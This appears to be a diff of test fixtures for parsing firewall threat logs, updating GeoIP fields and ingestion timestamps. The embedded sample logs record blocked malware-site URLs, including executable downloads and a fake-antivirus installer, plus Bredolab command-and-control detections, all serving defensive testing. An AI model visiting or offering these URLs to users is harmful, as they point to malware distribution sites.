@@ -4580,22 +4420,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4698,7 +4533,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079192800Z", + "ingested": "2021-12-14T14:49:56.151591782Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4723,22 +4558,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -4839,7 +4669,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079214800Z", + "ingested": "2021-12-14T14:49:56.151592202Z", "original": "Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:47.000-04:00", "timezone": "America/New_York", @@ -4864,22 +4694,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Korea Republic Of", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4980,7 +4805,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079220900Z", + "ingested": "2021-12-14T14:49:56.151592674Z", "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", 
@@ -5005,22 +4830,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5121,7 +4941,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079226800Z", + "ingested": "2021-12-14T14:49:56.151593027Z", "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", @@ -5146,22 +4966,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -5262,7 +5077,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079232700Z", + "ingested": "2021-12-14T14:49:56.151593366Z", "original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:12.000-04:00", "timezone": "America/New_York", @@ -5287,22 +5102,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5403,7 +5213,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079238500Z", + "ingested": "2021-12-14T14:49:56.151593708Z", "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", 
@@ -5428,22 +5238,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5544,7 +5349,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079244200Z", + "ingested": "2021-12-14T14:49:56.151594108Z", "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", @@ -5569,22 +5374,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -5685,7 +5485,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079250Z", + "ingested": "2021-12-14T14:49:56.151594475Z", "original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:03.000-04:00", "timezone": "America/New_York", @@ -5710,22 +5510,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5826,7 +5621,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079255900Z", + "ingested": "2021-12-14T14:49:56.151594849Z", "original": "Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:23.000-04:00", "timezone": "America/New_York", 
@@ -5851,22 +5646,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5967,7 +5757,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079261700Z", + "ingested": "2021-12-14T14:49:56.151595207Z", "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", @@ -5992,22 +5782,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -6108,7 +5893,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079267400Z", + "ingested": "2021-12-14T14:49:56.151595555Z", "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", @@ -6147,22 +5932,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6249,7 +6029,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:42:59.079273200Z", + "ingested": "2021-12-14T14:49:56.151595900Z", "original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2012-10-30T09:53:33.000-04:00", "timezone": "America/New_York", 
@@ -6271,22 +6051,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Canada", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6387,7 +6162,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079277300Z", + "ingested": "2021-12-14T14:49:56.151596274Z", "original": "Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", "created": "2012-10-30T09:53:38.000-04:00", "timezone": "America/New_York", @@ -6412,22 +6187,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -6528,7 +6298,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079282Z", + "ingested": "2021-12-14T14:49:56.151596615Z", "original": "Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:53:48.000-04:00", "timezone": "America/New_York", @@ -6553,22 +6323,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Virgin Islands British", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6669,7 +6434,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079287400Z", + "ingested": "2021-12-14T14:49:56.151596972Z", "original": "Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", "created": "2012-10-30T09:53:58.000-04:00", "timezone": "America/New_York", 
@@ -6694,22 +6459,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6810,7 +6570,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079292300Z", + "ingested": "2021-12-14T14:49:56.151597346Z", "original": "Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:55:23.000-04:00", "timezone": "America/New_York", @@ -6835,22 +6595,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -6951,7 +6706,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079296300Z", + "ingested": "2021-12-14T14:49:56.151597687Z", "original": "Oct 30 09:56:23 1,2012/10/30 09:56:23,01606001116,THREAT,url,1,2012/04/10 04:36:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:52,22479,1,58753,80,0,0,0x200000,tcp,block-url,\"gometascan.com/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:56:23.000-04:00", "timezone": "America/New_York", @@ -6976,22 +6731,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7092,7 +6842,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079300900Z", + "ingested": "2021-12-14T14:49:56.151598049Z", "original": "Oct 30 09:57:33 1,2012/10/30 09:57:33,01606001116,THREAT,url,1,2012/04/10 04:36:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:40,21458,1,58708,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/download/Install_11-1.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:33.000-04:00", "timezone": "America/New_York", 
@@ -7117,22 +6867,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7233,7 +6978,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079305200Z", + "ingested": "2021-12-14T14:49:56.151598507Z", "original": "Oct 30 09:57:38 1,2012/10/30 09:57:38,01606001116,THREAT,url,1,2012/04/10 04:36:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:39,21577,1,58707,80,0,0,0x200000,tcp,block-url,\"antivirus-powerful-scannerv2.com/1/?id=11-1\u0026back==TQzyDTyMUQNMI=N\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:57:38.000-04:00", "timezone": "America/New_York", @@ -7258,22 +7003,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -7374,7 +7114,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079309100Z", + "ingested": "2021-12-14T14:49:56.151598846Z", "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", @@ -7399,22 +7139,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7515,7 +7250,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079313100Z", + "ingested": "2021-12-14T14:49:56.151599194Z", "original": "Mar 25 23:58:52 1,2013/03/25 23:58:52,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:52.000-04:00", "timezone": "America/New_York", 
@@ -7554,22 +7289,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7656,7 +7386,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079316600Z", + "ingested": "2021-12-14T14:49:56.151599641Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,file,1,2012/04/10 04:19:59,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:20:05,64856,1,80,54431,0,0,0x200000,tcp,deny,\"uLLGRaXP.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -7681,22 +7411,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, 
@@ -7797,7 +7522,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079321700Z", + "ingested": "2021-12-14T14:49:56.151599995Z", "original": "Mar 25 23:58:57 1,2013/03/25 23:58:57,1606001116,THREAT,url,1,2012/04/10 04:36:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:36:28,21487,1,58603,80,0,0,0x200000,tcp,block-url,\"basdzsdas.com/poker/config.bin\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2013-03-25T23:58:57.000-04:00", "timezone": "America/New_York", @@ -7836,22 +7561,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "European Union", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -7938,7 +7658,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:42:59.079327600Z", + "ingested": "2021-12-14T14:49:56.151600341Z", "original": "Mar 25 23:59:07 1,2013/03/25 23:59:07,01606001116,THREAT,file,1,2012/04/10 04:51:29,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:51:34,37983,1,80,61220,0,0,0x200000,tcp,deny,\"FunkyEmoticons_setup.exe\",Windows Executable (EXE)(52020),any,low,server-to-client,0,0x0,European Union,192.168.0.0-192.168.255.255,0,", "created": "2013-03-25T23:59:07.000-04:00", "timezone": "America/New_York", 
